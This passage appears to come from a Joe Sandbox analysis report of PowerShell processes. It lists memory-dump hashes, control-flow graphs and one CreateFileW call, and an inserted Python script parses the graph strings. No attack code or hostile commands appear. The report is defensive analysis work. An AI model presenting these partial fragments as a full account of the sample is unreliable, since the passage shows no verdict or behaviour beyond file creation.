                                                                • Instruction Fuzzy Hash: E5F0393AB00109DFDF04DFA4E8509EEBB72FB98324B24C52AEA0997205D7319952DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2df5288f4860caa7fdc3ba9d803e536709d95012e13c90546bd1f154746e39fc
                                                                • Instruction ID: a76de744f9a6697995d35331a7f00f69aaf8ea612e6a6bfbf04f93af8fb6b4f0
                                                                • Opcode Fuzzy Hash: 2df5288f4860caa7fdc3ba9d803e536709d95012e13c90546bd1f154746e39fc
                                                                • Instruction Fuzzy Hash: BDE026B14087CA8EDB128710EB643ED3FA05F03B04F2104CBC094EA1D2C7340202E3A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 179f74c14315e5de3027d3b051fc1dd4eb24ff9858b0b211bdd64d5eabd7a530
                                                                • Instruction ID: e7d1dcf7c88eda84b6f0e4d196bd6afeb5773ab0b00c5e2bb687f112a91662b8
                                                                • Opcode Fuzzy Hash: 179f74c14315e5de3027d3b051fc1dd4eb24ff9858b0b211bdd64d5eabd7a530
                                                                • Instruction Fuzzy Hash: E0F03931D4525AEBDB75DF44D805BEDBB71BB18354F20849BE049A2181CBB40E80FF62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                • Instruction ID: 4fa007246656fcc6e2ddb233ec991ec6a0263225cb59dfda84ba0e271355ff2f
                                                                • Opcode Fuzzy Hash: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                • Instruction Fuzzy Hash: 77B09237A08108C9DB008A84B4417EDF738E790325F208027C6145108083710268A6A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Execution Graph

                                                                Execution Coverage: 7.6%
                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                Signature Coverage: 0%
                                                                Total number of Nodes: 7
                                                                Total number of Limit Nodes: 1

                                                                Graph

                                                                [Execution graph rendered as an image; graph source omitted. Nodes: 846f868 (entry), 846f274, 846f887, 846f89d, 846f910 (CreateFileW), 846f964 (CreateFileW), 846f9a1.]

                                                                Executed Functions

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                [Control-flow graph of the function at 35f6337 rendered as an image; edge list omitted. Blocks span 35f6337 to 35f6edf; the function calls into 35f6ee0 and 35f6ef0.]
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f46f58316242afaeff6e6e928c86e8d7f7c731e4a4513e0dab276647bceaf8f
                                                                • Instruction ID: 98c7da69cb0eac41439e41e4c9a318b2e8b0a2d22b4c6dd8a5dcc1e8be17be45
                                                                • Opcode Fuzzy Hash: 1f46f58316242afaeff6e6e928c86e8d7f7c731e4a4513e0dab276647bceaf8f
                                                                • Instruction Fuzzy Hash: D4522C34A01218CFDB24DB24D854BADB7B2FF89304F1445E9D90AAB3A1DB35AD45CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                [Control-flow graph of the function at 84170a8 rendered as an image; edge list omitted. Blocks span 84170a8 to 8417b0a; the function calls into 8412bb0.]
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d3c846804641da5b35a6e3d64389cbd80841748cf4d0b4f646d3b0fe95c268e
                                                                • Instruction ID: c75e50d1eca5561fc63ffd8b8d83fe793ffb2be63ff3f677b0919cbb9d056510
                                                                • Opcode Fuzzy Hash: 7d3c846804641da5b35a6e3d64389cbd80841748cf4d0b4f646d3b0fe95c268e
                                                                • Instruction Fuzzy Hash: 73429034A00219DFEB25DB64CC50BADB772EF88304F1485AAD9097B395DB719D81CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01e760f0e4d183e1bb916800799daff4da23cb0fdb6e3be26fe6367d1d20c179
                                                                • Instruction ID: a3a5fca9fe36b535d9ee987b99b2ccaaffe74811896a3951553b07d0627d62ff
                                                                • Opcode Fuzzy Hash: 01e760f0e4d183e1bb916800799daff4da23cb0fdb6e3be26fe6367d1d20c179
                                                                • Instruction Fuzzy Hash: D532D034A00205AFC715DF28D894E6AFBB2FF89310F5985A9EA159B371C732EC51CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01954d50d9e533a75dd47131ce7ab9fdb6cdb3f3d04778bcd0a500809e4860a7
                                                                • Instruction ID: e7c466dfbc4d2e8a0eb71f1f9ccc9b4438eced06fa4fa605a522c43c78434890
                                                                • Opcode Fuzzy Hash: 01954d50d9e533a75dd47131ce7ab9fdb6cdb3f3d04778bcd0a500809e4860a7
                                                                • Instruction Fuzzy Hash: 2FD18E35E007198FDB14CF65D840B9EBBB6FFC9304F2586A9D508AB251EB70A985CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e84a3223ab9e179b86a1bbb4dac5ea682030b64dba86a248950b9ec079eae5f3
                                                                • Instruction ID: 08fc181611f032cf1324b07b5b667af1d747683353bdac20fee748741d04cd3a
                                                                • Opcode Fuzzy Hash: e84a3223ab9e179b86a1bbb4dac5ea682030b64dba86a248950b9ec079eae5f3
                                                                • Instruction Fuzzy Hash: A4E1B134A00219DFDB25DB64CC50BAEB7B2EF89304F1485AAD5097B391DF71AD81CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f882a0277125e2708302a4d30e4b49780f66b8728b3189768a296a4abbff58f
                                                                • Instruction ID: dcd2aadc3fbf00867d6c91661a7a2d09fd49c9c4d71fdac7ea326a6b682750a0
                                                                • Opcode Fuzzy Hash: 8f882a0277125e2708302a4d30e4b49780f66b8728b3189768a296a4abbff58f
                                                                • Instruction Fuzzy Hash: B6A16B74A40605CFE719DF34C498BAABBF2BF88304F149569D8029B3A5CB75EC85CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463300519.0000000008460000.00000040.00000001.sdmp, Offset: 08460000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8460000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 9ac370299097f7be69742d39ba35c34b3987bab88008f4c7bd6fc5dce4b4f7c5
                                                                • Instruction ID: e648900a1028099c4b673c82d22543bbcc3beb8f066cd6354ab8c4c08568127e
                                                                • Opcode Fuzzy Hash: 9ac370299097f7be69742d39ba35c34b3987bab88008f4c7bd6fc5dce4b4f7c5
                                                                • Instruction Fuzzy Hash: AB41AE75A04249AFDB00CFA9D840BAEFBB5FB49314F14816AE508AB380CB759954CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "
                                                                • API String ID: 0-123907689
                                                                • Opcode ID: 6e1bbb709b4470fc3af03b1b2b0d2bc167bafaf1552c9c04fe67589442187aed
                                                                • Instruction ID: 402e56e7d648452d3fb71c7fe6eb55bd4ce3e9b7dfcbd219ff93bfd3dd98263c
                                                                • Opcode Fuzzy Hash: 6e1bbb709b4470fc3af03b1b2b0d2bc167bafaf1552c9c04fe67589442187aed
                                                                • Instruction Fuzzy Hash: 5AE10A74A002088FDB14DFA5D984BAEB7F6FF48304F248569D605AB3A1DB72AD45CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0846F887,00000000,00000000,00000003,00000000,00000002), ref: 0846F992
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463300519.0000000008460000.00000040.00000001.sdmp, Offset: 08460000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8460000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 216b8ddef3fd597ae18b10e196f2a5a37bab0195897d74bbbd608354265c2b6d
                                                                • Instruction ID: 9271e2b5cce1b27e4a18c49c8d0a753eff339b22241d9dc16a45137675422946
                                                                • Opcode Fuzzy Hash: 216b8ddef3fd597ae18b10e196f2a5a37bab0195897d74bbbd608354265c2b6d
                                                                • Instruction Fuzzy Hash: 6A2125B5D00259EFCB10CF99D844AEEBBB4FB48324F04851AE918A7610C775A924CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1ab3a4fb50f809031f70fd7d71217462b5234796f5a3ba518757608820e1390
                                                                • Instruction ID: ba29961b6f5b61a856727c7a3a9f73b66cd229ecd465799b8562cf7468f2620c
                                                                • Opcode Fuzzy Hash: c1ab3a4fb50f809031f70fd7d71217462b5234796f5a3ba518757608820e1390
                                                                • Instruction Fuzzy Hash: 9C125974B00614DFCB14DF68D594AAEB7F2EF88605F24416DE406AB361CB75EC82CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78f68d4c1440d669c93cc8ae3e15153cc49df6cf1834afcc1f50381547921e57
                                                                • Instruction ID: db47add218f3ff0a5e96f96281cd9d28ec1eb7c160c6d4ca923ffd3661aad764
                                                                • Opcode Fuzzy Hash: 78f68d4c1440d669c93cc8ae3e15153cc49df6cf1834afcc1f50381547921e57
                                                                • Instruction Fuzzy Hash: DEE1E878A002058FDB14DF65D484D9DBBB2BF8C324F595698D905AB3A5DB30EC85CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9843d8f59de74306b81a05672003e84385373e6ef3c85d3a5b20cf4ab8a7291c
                                                                • Instruction ID: 6aec79133c1dad8aa7955a18959c3c09cc2928a2639d54de6b054439b41a3011
                                                                • Opcode Fuzzy Hash: 9843d8f59de74306b81a05672003e84385373e6ef3c85d3a5b20cf4ab8a7291c
                                                                • Instruction Fuzzy Hash: C8D15C74E002089FCB04DFA4D950AEEBBF6FF89304F248468D805AB395DB75AD45CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18d647488e8a6110bdef4d2e9cddbf8793875feb53a46e4bc9b1a53fc50b43ee
                                                                • Instruction ID: 6ebdbbc7dbab34fb0b16dac136a223609cfaf3308d049ad41f9fb0fa45ba86a2
                                                                • Opcode Fuzzy Hash: 18d647488e8a6110bdef4d2e9cddbf8793875feb53a46e4bc9b1a53fc50b43ee
                                                                • Instruction Fuzzy Hash: 48B17E38610205CFDB14EF64D854AAEB7A2FFC8208F58892DD1059B764DB74AD09CBE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cb3c5a743ecea17fcd325bdb130d8ba82bbca5a2a4f292b106aeab64549e5d4
                                                                • Instruction ID: 7156a4dd6a9cd6c010f589bee8144014841967fa9689e51eff2324ced10d5ded
                                                                • Opcode Fuzzy Hash: 1cb3c5a743ecea17fcd325bdb130d8ba82bbca5a2a4f292b106aeab64549e5d4
                                                                • Instruction Fuzzy Hash: F6B17D34B00605DFDB15DF64D894AAEBBF6FF88600F18856DE9469B351DB35AC028B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph (function at 35f53f2: 15 basic blocks, 19 edges; the executed / not-executed colouring of the graph image is not available in this text view)
                                                                • Basic blocks (node id: address range, or single address; "call" nodes name the call target)
                                                                  1507: 35f53f2-35f5421
                                                                  1509: 35f542d-35f544d
                                                                  1510: 35f5423-35f542a
                                                                  1512: 35f54ee-35f568c
                                                                  1513: 35f5453-35f54eb
                                                                  1532: 35f568e-35f5694
                                                                  1533: 35f56a4-35f570a
                                                                  1534: 35f5698-35f569a
                                                                  1535: 35f5696
                                                                  1541: 35f5713-35f5785
                                                                  1547: 35f5787-35f5795
                                                                  1548: 35f57b4
                                                                  1550: 35f5797-35f57b2
                                                                  1553: 35f570d call 35f5e78
                                                                  1554: 35f570d call 35f5e68
                                                                • Edges (source -> successors)
                                                                  1507 -> 1509, 1510
                                                                  1509 -> 1512, 1513
                                                                  1512 -> 1532, 1533
                                                                  1532 -> 1534, 1535
                                                                  1533 -> 1553, 1554
                                                                  1534 -> 1533
                                                                  1535 -> 1533
                                                                  1541 -> 1547, 1548
                                                                  1547 -> 1548, 1550
                                                                  1550 -> 1548
                                                                  1553 -> 1541
                                                                  1554 -> 1541
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4db44b5d1042e27fbd425638d7f8e31d29346dfe8cdc06885f4549537c177116
                                                                • Instruction ID: 4164de371a06f556594671b851adb9507205bfc6baf123e7a937f630bed11ea6
                                                                • Opcode Fuzzy Hash: 4db44b5d1042e27fbd425638d7f8e31d29346dfe8cdc06885f4549537c177116
                                                                • Instruction Fuzzy Hash: 91B18075A00208DFDB14DFA4D880ADDBBB6FF89310F248569E505AB391DB71AD52CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
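The per-function control-flow graphs in this report are exported by Joe Sandbox as one whitespace-separated token string: a node id followed by an address or address range, an optional "call <target>" pair, and "src->dst" edges. The following is an added example, not code from Joe Sandbox or from this report, that parses such a string into blocks and edges and derives the facts an analyst usually wants from a dumped function (entry and exit blocks, call sites, block sizes). The token grammar is inferred from the strings visible in this report; the names parse_cfg, Block, Cfg and summarize are this example's own. The input is the graph string for the function at 35f53f2 copied from the record above.

```python
"""Parse a Joe Sandbox 'control_flow_graph' token string into blocks and edges.

Added example; the grammar (node id, address[-address], optional 'call target',
'src->dst' edges) is inferred from the strings shown in the report.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Graph text for the function at 35f53f2, copied from the report record above.
CFG_TEXT = (
    "control_flow_graph 1507 35f53f2-35f5421 1509 35f542d-35f544d 1507->1509 "
    "1510 35f5423-35f542a 1507->1510 1512 35f54ee-35f568c 1509->1512 "
    "1513 35f5453-35f54eb 1509->1513 1532 35f568e-35f5694 1512->1532 "
    "1533 35f56a4-35f570a 1512->1533 1534 35f5698-35f569a 1532->1534 "
    "1535 35f5696 1532->1535 1553 35f570d call 35f5e78 1533->1553 "
    "1554 35f570d call 35f5e68 1533->1554 1534->1533 1535->1533 "
    "1541 35f5713-35f5785 1547 35f5787-35f5795 1541->1547 1548 35f57b4 "
    "1541->1548 1547->1548 1550 35f5797-35f57b2 1547->1550 1550->1548 "
    "1553->1541 1554->1541"
)


@dataclass
class Block:
    node_id: int
    start: int
    end: int  # inclusive; equals start when the report gives a single address
    call_target: Optional[int] = None  # set for "call <target>" nodes

    @property
    def size(self) -> int:
        """Byte span the report attributes to this block."""
        return self.end - self.start + 1


@dataclass
class Cfg:
    blocks: Dict[int, Block] = field(default_factory=dict)
    edges: List[Tuple[int, int]] = field(default_factory=list)

    def successors(self, node_id: int) -> List[int]:
        return sorted(dst for src, dst in self.edges if src == node_id)

    def entry_blocks(self) -> List[int]:
        """Blocks with no incoming edge (normally just the function entry)."""
        targets = {dst for _, dst in self.edges}
        return sorted(b for b in self.blocks if b not in targets)

    def exit_blocks(self) -> List[int]:
        """Blocks with no outgoing edge (returns or unresolved jumps)."""
        sources = {src for src, _ in self.edges}
        return sorted(b for b in self.blocks if b not in sources)

    def call_sites(self) -> List[Tuple[int, int, int]]:
        """(node id, call address, target) per call node. The report may list two
        nodes at one address with different targets; both are kept, not merged."""
        return sorted((b.node_id, b.start, b.call_target)
                      for b in self.blocks.values() if b.call_target is not None)

    def dangling_edges(self) -> List[Tuple[int, int]]:
        """Edges whose endpoints were never declared as blocks (export or parse defect)."""
        return [e for e in self.edges
                if e[0] not in self.blocks or e[1] not in self.blocks]


def parse_cfg(text: str) -> Cfg:
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    cfg = Cfg()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:  # edge: "src->dst", ids are decimal
            src, dst = tok.split("->", 1)
            cfg.edges.append((int(src), int(dst)))
            i += 1
            continue
        # Node declaration: "<id> <start>[-<end>] [call <target>]", addresses hex
        node_id = int(tok)
        if i + 1 >= len(tokens):
            raise ValueError(f"node {node_id} has no address")
        start_s, _, end_s = tokens[i + 1].partition("-")
        start = int(start_s, 16)
        end = int(end_s, 16) if end_s else start
        i += 2
        call_target = None
        if i + 1 < len(tokens) and tokens[i] == "call":
            call_target = int(tokens[i + 1], 16)
            i += 2
        cfg.blocks[node_id] = Block(node_id, start, end, call_target)
    if cfg.dangling_edges():
        raise ValueError(f"edges reference undeclared blocks: {cfg.dangling_edges()}")
    return cfg


def summarize(cfg: Cfg) -> dict:
    """Counts, entry/exit blocks, call sites and the largest block of the graph."""
    largest = max(cfg.blocks.values(), key=lambda b: b.size)
    return {
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "entry": cfg.entry_blocks(),
        "exits": cfg.exit_blocks(),
        "calls": [(hex(addr), hex(tgt)) for _, addr, tgt in cfg.call_sites()],
        "largest_block": (largest.node_id, hex(largest.start), largest.size),
    }


if __name__ == "__main__":
    print(summarize(parse_cfg(CFG_TEXT)))
```

For this function the parser finds a single entry block (1507), three blocks with no successor (1510, 1513, 1548), and two call nodes at the same address 35f570d with different targets; dangling_edges() is the check to run first when a graph string has been truncated by copy-paste, since a cut string still tokenises cleanly but leaves edges pointing at undeclared blocks.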

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bd3811ef617c2f6effed5e90d60441c752ad3e1c3794c38545b36c78ad42b36
                                                                • Instruction ID: 6d8f43a1b166f40c1aa1fd4950fd9e7717af68843cfe75fe94fe18fe46018f4a
                                                                • Opcode Fuzzy Hash: 5bd3811ef617c2f6effed5e90d60441c752ad3e1c3794c38545b36c78ad42b36
                                                                • Instruction Fuzzy Hash: 38A16E39B002088FCB14EBA5D994AADB7F2FF89304F64856CD509AF394DB709D068F95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05a27ff93407a893d6d5d2a9732749142085853c86beed3b0eba1027ead72f06
                                                                • Instruction ID: ab35cf0d954b0a800bbdfe289ec84cc358f7dc4d62ef8279f1bba76ddde92f5e
                                                                • Opcode Fuzzy Hash: 05a27ff93407a893d6d5d2a9732749142085853c86beed3b0eba1027ead72f06
                                                                • Instruction Fuzzy Hash: 87B1CF78A00209CFCB14DF98D584A99B7F2FF48314F298999E905AB365DB70FD46CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: befabeb01c8ed379bff0c87e1dd0c0009185a97052214b30237eadd6cfcb3d99
                                                                • Instruction ID: df91022302de0574d614afc206f76d8cfec807b6fd7856e50508ff022528cd08
                                                                • Opcode Fuzzy Hash: befabeb01c8ed379bff0c87e1dd0c0009185a97052214b30237eadd6cfcb3d99
                                                                • Instruction Fuzzy Hash: 7A818E39B006049FDB14DB64E844AAEB7E6EBC8364F198479D509DF351CF35EC018BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463115200.0000000008400000.00000040.00000001.sdmp, Offset: 08400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8400000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19b35601561f8720b6958867152719bcb78af523c64c8add38b6b2f2f818283f
                                                                • Instruction ID: c3f8a05ee22d4c5a957b9e611db0bbd82c6ba6550a6f39feac393dc35c714027
                                                                • Opcode Fuzzy Hash: 19b35601561f8720b6958867152719bcb78af523c64c8add38b6b2f2f818283f
                                                                • Instruction Fuzzy Hash: 4181B435B046549FDB10DA6C8460B6BFBA2EFC5226F1884BFD945CB381DB31C942CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19ccd8db64f4f57045ccb3c23b62572cf5e48420a497656a67099e552bde993e
                                                                • Instruction ID: 8e667c12229b361ca04ccab78ba5ace1e4f7a6eb6c838ab3a3f17cef2e405917
                                                                • Opcode Fuzzy Hash: 19ccd8db64f4f57045ccb3c23b62572cf5e48420a497656a67099e552bde993e
                                                                • Instruction Fuzzy Hash: 1C916D34A002089FCB14EFA5D994AADBBF2FF89304F248568D509AF394DB719D06CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f92b15a2f83d8a36a432557973bbbec2088337609cbf57849094b3efd8d157d9
                                                                • Instruction ID: 79c873d8ae3742f5174bb3731bb426d4950d063ff1240836f510167c0e39ac6c
                                                                • Opcode Fuzzy Hash: f92b15a2f83d8a36a432557973bbbec2088337609cbf57849094b3efd8d157d9
                                                                • Instruction Fuzzy Hash: E3918F38A00204DFDB14DB68E454B9DBBF2FF88315F5889A9DA05AB3A1DB35EC05CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75d13a0bfffc087e37268ea042f149d15ab591ad7333a713848ea05deb611cbe
                                                                • Instruction ID: 88e4d654ec4858c87dc85d983e553a80d689baf2579acd37cb7b57626984df3f
                                                                • Opcode Fuzzy Hash: 75d13a0bfffc087e37268ea042f149d15ab591ad7333a713848ea05deb611cbe
                                                                • Instruction Fuzzy Hash: D4B12774A00319CFDB14DF65D844B9EBBB2FF89300F1585A9D908AB350DB70A985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67113fbfff4af9f09b0d4967c565b4e7e9f3a05e3ac982e03e0b606fd24241c4
                                                                • Instruction ID: 1dcc6eb03c9bd8cae6a737ad42c7623de7b8d9557e9cc16fff20caa3aa93da98
                                                                • Opcode Fuzzy Hash: 67113fbfff4af9f09b0d4967c565b4e7e9f3a05e3ac982e03e0b606fd24241c4
                                                                • Instruction Fuzzy Hash: E6A16D38A00209DFDB14DF69C4A0AAEBBB2EF89314F14896DE4559F351CB31EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
